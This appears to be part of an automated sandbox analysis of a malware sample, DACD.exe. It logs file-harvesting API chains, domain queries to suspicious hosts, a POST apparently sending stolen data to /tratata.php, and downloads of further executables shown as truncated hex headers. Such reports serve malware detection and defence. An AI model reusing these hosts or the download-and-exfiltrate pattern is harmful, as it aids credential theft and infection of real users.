                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,22_2_00401090
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,22_2_00409B40
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,22_2_004087E0
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,22_2_004096E0
                        Source: C:\Users\user\AppData\Local\Temp\DACD.exeCode function: 22_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,22_2_00409970

                        Networking:

                        barindex
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\explorer.exeDomain query: bitly.com
                        Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                        Source: C:\Windows\explorer.exeDomain query: unicupload.top
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187Jump to behavior
                        Source: C:\Windows\explorer.exeDomain query: f0616387.xsph.ru
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144Jump to behavior
                        Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                        Source: C:\Windows\explorer.exeDomain query: bit.ly
                        Source: C:\Windows\explorer.exeDomain query: goo.su
                        Source: C:\Windows\explorer.exeDomain query: transfer.sh
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80Jump to behavior
                        Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                        Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                        Source: global trafficHTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=dssnulsk4q345etur6fdlaaidu
                        Source: global trafficHTTP traffic detected: POST /tratata.php HTTP/1.1Content-Type: multipart/form-data; boundary=----VKNYUK68YUSRQI58Host: file-file-host4.comContent-Length: 92575Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=dssnulsk4q345etur6fdlaaidu
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 06 Jan 2022 07:08:50 GMTContent-Type: application/x-msdos-programContent-Length: 307712Connection: closeLast-Modified: Thu, 06 Jan 2022 07:08:02 GMTETag: "4b200-5d4e487f6726a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd da db ac b9 bb b5 ff b9 bb b5 ff b9 bb b5 ff a7 e9 20 ff a8 bb b5 ff a7 e9 36 ff ca bb b5 ff 9e 7d ce ff ba bb b5 ff b9 bb b4 ff 7d bb b5 ff a7 e9 31 ff 80 bb b5 ff a7 e9 21 ff b8 bb b5 ff a7 e9 24 ff b8 bb b5 ff 52 69 63 68 b9 bb b5 ff 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 dc 84 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 b8 03 00 00 04 02 00 00 00 00 00 d0 cd 01 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 47 e6 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 b7 03 00 28 00 00 00 00 40 05 00 18 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 78 1b 00 00 20 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 8a 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fe b7 03 00 00 10 00 00 00 b8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 04 20 01 00 00 d0 03 00 00 14 00 00 00 bc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 65 67 00 00 00 00 05 00 00 00 00 00 05 00 00 02 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 68 61 72 75 6d 65 73 4b 00 00 00 00 10 05 00 00 02 00 00 00 d2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 78 65 63 61 74 ea 00 00 00 00 20 05 00 00 02 00 00 00 d4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 6f 6d 00 00 00 00 93 0d 00 00 00 30 05 00 00 0e 00 00 00 d6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 90 00 00 00 40 05 00 00 92 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 3a 00 00 00 e0 05 00 00 3c 00 00 00 76 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 06 Jan 2022 07:08:56 GMTContent-Type: application/x-msdos-programContent-Length: 358912Connection: closeLast-Modified: Mon, 03 Jan 2022 22:00:28 GMTETag: "57a00-5d4b4a60838eb"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6b 91 a1 53 2f f0 cf 00 2f f0 cf 00 2f f0 cf 00 31 a2 5a 00 3d f0 cf 00 31 a2 4c 00 57 f0 cf 00 08 36 b4 00 2a f0 cf 00 2f f0 ce 00 ee f0 cf 00 31 a2 4b 00 10 f0 cf 00 31 a2 5b 00 2e f0 cf 00 31 a2 5e 00 2e f0 cf 00 52 69 63 68 2f f0 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 74 f1 e5 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 3c 04 00 00 4a 02 00 00 00 00 00 c0 34 02 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 41 c1 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 39 04 00 3c 00 00 00 00 30 06 00 f8 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 14 23 00 00 50 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 a6 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 3a 04 00 00 10 00 00 00 3c 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 60 9a 01 00 00 50 04 00 00 8c 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 61 6d 69 63 61 6b 05 00 00 00 00 f0 05 00 00 02 00 00 00 cc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 73 00 00 00 00 4b 00 00 00 00 00 06 00 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 6f 64 61 76 00 00 ea 00 00 00 00 10 06 00 00 02 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 67 69 72 6f 66 93 0d 00 00 00 20 06 00 00 0e 00 00 00 d2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 59 00 00 00 30 06 00 00 5a 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a2 3e 00 00 00 90 06 00 00 40 00 00 00 3a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 06 Jan 2022 07:09:02 GMTContent-Type: application/x-msdos-programContent-Length: 309760Connection: closeLast-Modified: Thu, 06 Jan 2022 07:09:02 GMTETag: W/"4ba00-5d4e48b866eed"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd da db ac b9 bb b5 ff b9 bb b5 ff b9 bb b5 ff a7 e9 20 ff a8 bb b5 ff a7 e9 36 ff ca bb b5 ff 9e 7d ce ff ba bb b5 ff b9 bb b4 ff 7d bb b5 ff a7 e9 31 ff 80 bb b5 ff a7 e9 21 ff b8 bb b5 ff a7 e9 24 ff b8 bb b5 ff 52 69 63 68 b9 bb b5 ff 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 80 04 9a 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c0 03 00 00 04 02 00 00 00 00 00 f0 d4 01 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 b1 8d 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 be 03 00 28 00 00 00 00 40 05 00 18 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 84 1b 00 00 20 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 8a 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1e bf 03 00 00 10 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 04 20 01 00 00 d0 03 00 00 14 00 00 00 c4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 6f 6e 61 67 00 00 05 00 00 00 00 00 05 00 00 02 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 6f 70 61 76 69 00 4b 00 00 00 00 10 05 00 00 02 00 00 00 da 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 61 73 00 00 00 00 ea 00 00 00 00 20 05 00 00 02 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 61 76 65 66 61 00 93 0d 00 00 00 30 05 00 00 0e 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 90 00 00 00 40 05 00 00 92 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 3a 00 00 00 e0 05 00 00 3c 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Thu, 06 Jan 2022 07:09:07 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: closeLast-Modified: Wed, 08 Dec 2021 03:32:46 GMTETag: "9d9d8-5d29a24b21380"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 07:09:55 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Wed, 05 Jan 2022 20:17:14 GMTETag: "97fd0-5d4db70843dbb"Accept-Ranges: bytesContent-Length: 622544Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 13 aa cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 2e 01 00 00 7c 05 00 00 00 00 00 00 00 07 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 08 00 00 04 00 00 8f 25 0a 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f0 02 00 48 01 00 00 00 00 03 00 40 f1 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 73 68 61 72 65 64 00 00 e0 02 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 72 64 61 74 61 00 00 00 10 00 00 00 f0 02 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 f1 03 00 00 00 03 00 40 f1 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 69 74 65 78 74 00 00 00 80 01 00 00 00 07 00 74 7d 01 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 06 Jan 2022 07:09:59 GMTContent-Type: application/x-msdos-programContent-Length: 760832Connection: closeLast-Modified: Sun, 02 Jan 2022 14:19:12 GMTETag: "b9c00-5d49a1695789b"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a 38 7e 52 3e 59 10 01 3e 59 10 01 3e 59 10 01 20 0b 85 01 2c 59 10 01 20 0b 93 01 46 59 10 01 19 9f 6b 01 3b 59 10 01 3e 59 11 01 80 59 10 01 20 0b 94 01 7e 59 10 01 20 0b 84 01 3f 59 10 01 20 0b 81 01 3f 59 10 01 52 69 63 68 3e 59 10 01 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 2e e4 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 6c 0a 00 00 3c 02 00 00 00 00 00 80 67 08 00 00 10 00 00 00 80 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 48 00 00 04 00 00 65 d4 0b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 6a 0a 00 3c 00 00 00 00 30 0c 00 b0 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 23 00 00 40 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 a3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc 6a 0a 00 00 10 00 00 00 6c 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 9a 01 00 00 80 0a 00 00 8c 00 00 00 70 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 6f 68 61 63 00 00 05 00 00 00 00 20 0c 00 00 02 00 00 00 fc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 c9 3b 00 00 30 0c 00 00 5a 00 00 00 fe 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 74 42 00 00 00 00 48 00 00 44 00 00 00 58 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Jan 2022 07:10:04 GMTContent-Type: application/octet-streamContent-Length: 1403392Last-Modified: Wed, 05 Jan 2022 17:13:47 GMTConnection: keep-aliveETag: "61d5d1cb-156a00"Expires: Thu, 13 Jan 2022 07:10:04 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 18 8c 24 7a 79 e2 77 7a 79 e2 77 7a 79 e2 77 6e 12 e1 76 77 79 e2 77 6e 12 e7 76 dc 79 e2 77 6e 12 e6 76 6c 79 e2 77 28 0c e6 76 6b 79 e2 77 28 0c e1 76 6e 79 e2 77 28 0c e7 76 30 79 e2 77 6e 12 e3 76 7f 79 e2 77 7a 79 e3 77 24 79 e2 77 c0 0c e7 76 7b 79 e2 77 c0 0c 1d 77 7b 79 e2 77 c0 0c e0 76 7b 79 e2 77 52 69 63 68 7a 79 e2 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 4c 84 d4 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 24 02 